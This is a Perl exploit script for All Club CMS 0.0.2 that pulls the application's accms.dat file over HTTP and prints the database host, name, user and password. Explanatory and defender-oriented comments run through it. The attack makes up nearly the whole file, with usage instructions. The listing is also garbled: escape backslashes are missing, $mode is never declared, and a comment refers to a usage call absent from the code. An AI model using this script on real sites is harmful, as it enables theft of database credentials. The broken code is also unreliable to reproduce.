
# Title : All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit
# Published : 2008-11-28
# Author : StAkeR


#!/usr/bin/perl 

=about

 All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit
 -------------------------------------------------------
 by athos - staker[at]hotmail[dot]it
 download on http://sourceforge.net
 -------------------------------------------------------
 Usage: perl exploit.pl localhost/cms [MODE]
        perl exploit.pl localhost/cms all 
        perl exploit.pl localhost/cms default    
 -------------------------------------------------------
 NOTE: Don't add me on MSN Messenger
                

=cut

use strict;
use warnings;
use IO::Socket;
use LWP::UserAgent;

# File-scope state shared by the two modes below: @conf holds the label/value
# list assembled in "default" mode, $result the text concatenated from it.
my (@conf,$result);

# Positional arguments: target host, application path, and a mode word
# ("all" or "default").  Only the third argument is checked; a missing host
# or path is not caught here and surfaces later in dbconfig().
# `&usage` (ampersand, no parens) also passes the caller's @_ along; the
# conventional call is `usage()`.
my $host = shift;
my $path = shift;
# dbconfig() fetches the remote accms.dat response as one string; it is then
# split into fields.  The separator /=s/ as printed here presumably read /=\s/
# before the backslash was lost — the escapes look stripped throughout this
# listing (see the "n" endings in the string literals below).
my @data = split /=s/,dbconfig();

# Abort unless the fetched text contains the DB_PASS label anywhere.
# dbconfig() returns a false value on a non-200 response, so the join is
# empty and this die fires.
die "Exploit Failed!n" unless(join('',@data) =~ /DB_PASS/i);

# Mode "all": fetch /$path/accms.dat with LWP and dump the raw body to STDOUT.
# This is a plain unauthenticated GET over HTTP; dbconfig() has already issued
# the same request with the same "Lynx (textmode)" User-Agent, so the target
# sees it twice.  For a defender, both requests land in the web server's
# access log under that path and User-Agent string.
if($mode =~ /all/i)
{
   # Indirect-object syntax (`new LWP::UserAgent(...)`); LWP::UserAgent->new(...)
   # is the conventional form.  The `or die $!` guard is unlikely to ever fire
   # on a constructor call.
   my $http = new LWP::UserAgent(
                                  agent   => 'Lynx (textmode)',
                                  timeout => 5,
                                ) or die $!;  
                              
   # $path is used verbatim, so a leading "/" in the argument yields "//" here.
   my $send = $http->get("http://${host}/${path}/accms.dat");
   
   if($send->is_success)
   {
      # Raw body only — no parsing in this mode.
      print STDOUT $send->content;
      exit;
   }
   else
   {
      # Exits with status 0 even on failure; the status line is the only signal.
      print STDERR $send->status_line;
      exit;
   }
}


# Mode "default": pick five values out of @data by fixed index and print them
# as "label:value" text.  The indices assume a specific field order in the
# fetched file; any other layout silently produces mislabeled output.
if($mode =~ /default/i)
{
   # Strip the label left over from the previous field.  `s/s//` as printed is
   # presumably `s/\s//` with the backslash lost; as written it deletes the
   # first literal "s".  Each of these warns (and leaves the element undef) if
   # the response had fewer than ten fields.
   $data[9] =~ s/s//;      # password
   $data[8] =~ s/DB_PASS//; # username
   $data[7] =~ s/DB_USER//; # db host
   $data[6] =~ s/DB_HOST//; # db name
   $data[5] =~ s/DEF_DB//;  # db type

   # Assigned to an array, so this is a flat list of alternating labels and
   # values, not a hash; the order here is the output order.
   @conf = (
             'dbhost:'   => $data[7],
             'dbname:'   => $data[6],
             'dbtype:'   => $data[5],
             'username:' => $data[8],
             'password:' => $data[9],
          );                

   # Concatenate labels and values back to back with no separator.
   foreach(@conf)
   {
      $result .= $_;
   }       

   # Drop every single space from $result.
   my $content = join '',split / /,$result;

   # The labels were just inserted by this block and contain no spaces, so
   # this match always succeeds and the else branch below is effectively dead.
   if($content =~ /(dbhost|dbname|dbtype|username|password)/i)
   {
      print STDOUT "[-] Exploit Successfully!n";
      print STDOUT $content;
      exit; 
   }
   else
   {
      print STDOUT "[-] Exploit Failed!n";
      print STDOUT "[-] by athos - staker[at]hotmail[dot]itn";
      exit;
   }  
}


# Fetch /$path/accms.dat from $host over a raw TCP socket on port 80 and
# return the full HTTP response (status line, headers and body) as one string.
# Reads the file-scope globals $host and $path; takes no arguments.
# Returns the response only when it contains "HTTP/1.1 200 OK"; otherwise the
# sub falls off its end and yields the false result of that failed match.
#
# Defender's note: everything this sub depends on is the web server handing
# out accms.dat as a static file.  Denying web access to that file (or keeping
# it outside the document root) makes the 200 check fail, and GET requests for
# that path with the "Lynx (textmode)" User-Agent are a simple log signature.
sub dbconfig
{
   my $html;
   # No Timeout option is given, so a peer that accepts the connection but
   # never answers blocks the read loop below indefinitely.  Port 80 is
   # hard-coded; HTTPS targets are not handled.
   my $sock = new IO::Socket::INET(
                                    PeerAddr => $host,
                                    PeerPort => 80,
                                    Proto    => 'tcp',
                                  ) or die $!;
                                  
                                     
   # Hand-built request.  The "rn" line endings are presumably "\r\n" with the
   # backslashes lost in this listing; as printed, the headers run together on
   # one line and a server would reject or misparse the request.  $host and
   # $path are interpolated unvalidated.
   my $data = "GET /$path/accms.dat HTTP/1.1rn".
              "Host: $hostrn".
              "User-Agent: Lynx (textmode)rn".
              "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn".
              "Accept-Language: en-us,en;q=0.5rn".
              "Accept-Encoding: text/plainrn".
              "Connection: closernrn";
              
   # Return value of send() is not checked.
   $sock->send($data);
  
   # Accumulate until EOF; relies on the server honouring "Connection: close".
   while(<$sock>) 
   { 
      $html .= $_; 
   }  return $html if $html =~ m{HTTP/1.1 200 OK};            
}   
   
   
   
# Print the command-line synopsis to STDOUT and exit with status 0.
# Called when the mode argument is missing.  Note that host and path are
# separate arguments here, whereas the POD header above shows them joined as
# "localhost/cms".  The "n" endings are presumably stripped "\n" escapes.
sub usage
{
   print STDOUT "[-] All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploitn";
   print STDOUT "[-] Usage: perl $0 [host] [path] [mode]n";
   print STDOUT "           perl $0 localhost /cms alln";
   print STDOUT "           perl $0 localhost /cms defaultn"; 
   exit;
}  
